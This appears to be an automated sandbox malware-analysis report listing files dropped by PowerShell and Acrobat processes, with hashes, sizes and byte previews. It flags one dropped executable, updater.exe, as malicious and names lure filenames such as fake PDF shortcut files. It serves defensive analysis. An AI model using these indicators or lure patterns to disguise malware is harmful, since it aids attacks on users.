SSDEEP:	12:Q3La/KDLI4MWuPTAq1KDLI4M0kvoDLI4MWuCv:ML9E4KH1qE4jE4Ks
MD5:	812F0A8C671812AA613FC139B69E8614
SHA1:	B4177437C50B25B06FB885362DA36FD171A1C5A9
SHA-256:	6D3DF2C3EA20D3A411078200AFA62DAC6AABA4210C83A2186E80195977BF0F89
SHA-512:	6A82C1F195C66FCC0533B20B8AE9B4F9CEBED6C8D7B450C574E864A60D627F3ABE32081BF65822157716F4672180E19C0DFA91D88663F7FC3CBE7FD0EB36B2EA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11608
Entropy (8bit):	4.890472898059848
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5:	8A4B02D8A977CB929C05D4BC2942C5A9
SHA1:	F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256:	624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512:	38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\27589682\OWoDjWrI.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2011444
Entropy (8bit):	6.104381684032337
Encrypted:	false
SSDEEP:	49152:DpD+okC1j/B5ZMQJrhES5Jr4l5/WSpCe/:gOZMt
MD5:	BCC04F3C8F29B9533C8AFF0681D4EB4F
SHA1:	2EDB98E832959106BC3E6110DFB0A20A549BDCB1
SHA-256:	D0E19B9FED36046A80CA84C68624EEED3FAC491962FC121D1D7B6433006990DC
SHA-512:	DCD54AE36962E5072BE4B31E20BC7D42A4FF9D90E95930F09A0CBDB6E0F7495A38409DEFCACF072C8C452188DBBF4863F5F8E21A24F50D36FFDAE61959176CF1
Malicious:	false
Preview:	\|.U..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\|.U....................................

C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.620131693023677
Encrypted:	false
SSDEEP:	12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5:	C56B5F0201A3B3DE53E561FE76912BFD
SHA1:	2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256:	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512:	195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: Whatsapp-GUI.exe, Detection: malicious, Browse Filename: Whatsapp-GUI.exe, Detection: malicious, Browse Filename: Agreement for Cooperation.PDF.lnk.download.lnk, Detection: malicious, Browse Filename: malware.zip, Detection: malicious, Browse Filename: Dark_drop_2_pers_lum_clean.exe.bin.exe, Detection: malicious, Browse Filename: Agreement for YouTube cooperation.pdf.lnk.download.lnk, Detection: malicious, Browse Filename: 3rd_cc_form_Oct_2024.pdf.lnk.download.lnk, Detection: malicious, Browse Filename: tQ6Z4Vjp5f.lnk, Detection: malicious, Browse Filename: doc-Impostos.cmd, Detection: malicious, Browse Filename: AlBXxWizEX.msi, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIe61fe.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.5081383324894926
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8Ad:Qw946cPbiOxDlbYnuRK7
MD5:	E0180B3360C489E70DBEFEFC1429E17D
SHA1:	DFBF8143A5FD8CD64AFBBBBDFDDA2204E99AB649
SHA-256:	802F66263DAE236335A6FA62EEE6899C344CA160F2E9762CDD7821543A4E8958
SHA-512:	97B9BE5762AD98065D2EA21E52FFBC6B69D1E82A70AD26170B70D8AAEEB07BDE13F44D6919D00EEF6E3D98E38D13C9C2C7EAF5C39C457F183D4AF551087CDCBC
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.7./.1.2./.2.0.2.4. . .0.4.:.0.8.:.2.8. .=.=.=.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4but251l.lkg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddfy2ipe.vmy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iofxkykn.1qp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mj5zux40.y2n.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcwgahdg.edz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1dymdd0.ihh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uhuhkz4q.a0y.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vubdxanm.rzc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\acrobat_sbx\A912oprrp_19n0vsh_5os.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	2706048
Entropy (8bit):	2.33363422045465
Encrypted:	false
SSDEEP:	6144:w11dOzfuE7Pvih3IePexEyPGFDqZDbTI2uvm/Midi5:QuEyPGFWZDbwm
MD5:	DB407A4982DC0F36B83013F46D26813D
SHA1:	C4D88D8D0E8576A8AAA3ABC7793CE1AD5D314578
SHA-256:	A07328F222BEE007496F065EAB6779BE9AE5CA9DEDEF7221FBD66ACEA321EEA0
SHA-512:	2567E07B1F15702AF493E9B14D5A451A9EF141D53A381B0D764C4C7A85D6E03E8F5E6B1D73CDC58FCE1EE74AFFEEBFD2D365D674F613E2B7A3AA864C785EF5F8
Malicious:	false
Preview:	................................................................................................................................................................2...................EN......................................................................................................................X....T..`...... ....Pi..`........... ...`.......Vd...f#.`...........`...`...... ........................................................................................................................................................................................en_US_2023_publink100079593.............................................................................................(.......`............f#.`...... C.......................................................................................................................................................................................................................................Lines 17a Through 17z...............................

C:\Users\user\AppData\Local\Temp\acrobat_sbx\A92ygk1o_19n0vsi_5os.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	1090560
Entropy (8bit):	2.1050857187547383
Encrypted:	false
SSDEEP:	3072:DoVEWBraU23o2gsywGEKIeci34FrnPl7x3Nj5/VLh6GWssJa3Ey8KfTwf+uoBK6R:uEU2fLyOMgLZugWx
MD5:	EC26B0EC17283676D50C919362B882BE
SHA1:	780F03E772D7F4D30D47F9DA00EF538128EF0DC0
SHA-256:	F965F82EA32878400C9DBBE7265EBCA8CB77679217CBE214C8F3AEF5F1C0BB5D
SHA-512:	88288B27C8E75FBC3B9BDDEA39D9950D671432DCA504A6C66B9115034AE1DED242FD63297C32780101A05DC8F7973FAF043CF3F724893463A1824FC55235EBD6
Malicious:	false
Preview:	............................................................................................................................................................................-...)...A12_acrobat_multiFile_generic_dark_32.pdf...................................................................................................8...........................................................................................................%...!...A12_acrobat_parcel_generic_64.pdf...........................................................................................................9..............................................................................................................&...A12_acrobat_parcel_generic_dark_32.pdf......................................................................................................:..............................................................................................................&...A12_acrobat_parcel_generic_dark_64.pdf..............

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-17 04-08-20-154.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.386483451061953
Encrypted:	false
SSDEEP:	384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
MD5:	F49CA270724D610D1589E217EA78D6D1
SHA1:	22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
SHA-256:	D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
SHA-512:	181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
Malicious:	false
Preview:	SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.3493724486985865
Encrypted:	false
SSDEEP:	384:PtnkNb0hpclid7qnDNqmJCLnkld31PP5+FiMmO8jmkW0ltYp/1io454pgTZJ2x5J:D2c
MD5:	3A599BC6AD76BB16F09A00B355395F63
SHA1:	207FC1889D2973C01B757E0D26EC1C62FD920245
SHA-256:	F9745C296D345FCAD95FDD4A8AE2ABE802B88CD112A7A316E7270E3A5C89FFE7
SHA-512:	B0BD2D097CE054429FB2EAC200103283149BDF24BF953A5590E9C6F9FDD96349409AC2F5F25D7E68AACA2CEAF5ED0361C93579BA909F1102E17ED3472E35FE20
Malicious:	false
Preview:	SessionID=8bf2bd13-8f75-4e14-93ff-cd1ee8e522b9.1734426500187 Timestamp=2024-12-17T04:08:20:188-0500 ThreadID=7252 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=8bf2bd13-8f75-4e14-93ff-cd1ee8e522b9.1734426500187 Timestamp=2024-12-17T04:08:20:189-0500 ThreadID=7252 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=8bf2bd13-8f75-4e14-93ff-cd1ee8e522b9.1734426500187 Timestamp=2024-12-17T04:08:20:189-0500 ThreadID=7252 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=8bf2bd13-8f75-4e14-93ff-cd1ee8e522b9.1734426500187 Timestamp=2024-12-17T04:08:20:189-0500 ThreadID=7252 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=8bf2bd13-8f75-4e14-93ff-cd1ee8e522b9.1734426500187 Timestamp=2024-12-17T04:08:20:190-0500 ThreadID=7252 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	35721
Entropy (8bit):	5.407969920025546
Encrypted:	false
SSDEEP:	768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRm:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRk
MD5:	A8C1D2749A06303D43FC6A23F270B84C
SHA1:	C8D58A595F96152B7FFD5A995C8C41D8C84F8DDF
SHA-256:	2B9E3F57174D2C4BDB34BBF4536E0F83F95A706F3C363A9A70851B24ADFC876D
SHA-512:	98FA3C2996591E4B08DF2978A0063DC2184B7C88A9781138F298CC78C494CDF7A5B7856AA0C611466121669DE8D3AE7D652E8B5A005953DF145AC3C2D1DCD801
Malicious:	false
Preview:	05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : *************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***********************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\219d9acf-47a9-4e2d-976d-7eb45e670a6b.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
MD5:	A0CFC77914D9BFBDD8BC1B1154A7B364
SHA1:	54962BFDF3797C95DC2A4C8B29E873743811AD30
SHA-256:	81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
SHA-512:	74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\674d030f-c086-43c8-81f2-4e2531fe9ae9.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/9wYIGNPQmeWL07oXGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:lwZG2XWLxXGZN3mlind9i4ufFXpAXkru
MD5:	CDB0A9F62FD4871F0603FBBF1FE6BD06
SHA1:	C972A2B8E6E7CD72A156C1EAB8F5F31E76A7DA24
SHA-256:	85BD3F2168D078DFF0ECEB670C3DC651E8797522C6A2921EC478EAD5A09E415F
SHA-512:	7FC3B110A45F9D518FEA45930B73F196FEE7DF472A17FB2CBB19A3BCBF5C78D439F68E2C615D8DACD5821EF60C1447112FB86431D768E28D9F08457563011F28
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\9f08a24c-531f-4abc-9e0d-c41a3ed9b16e.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
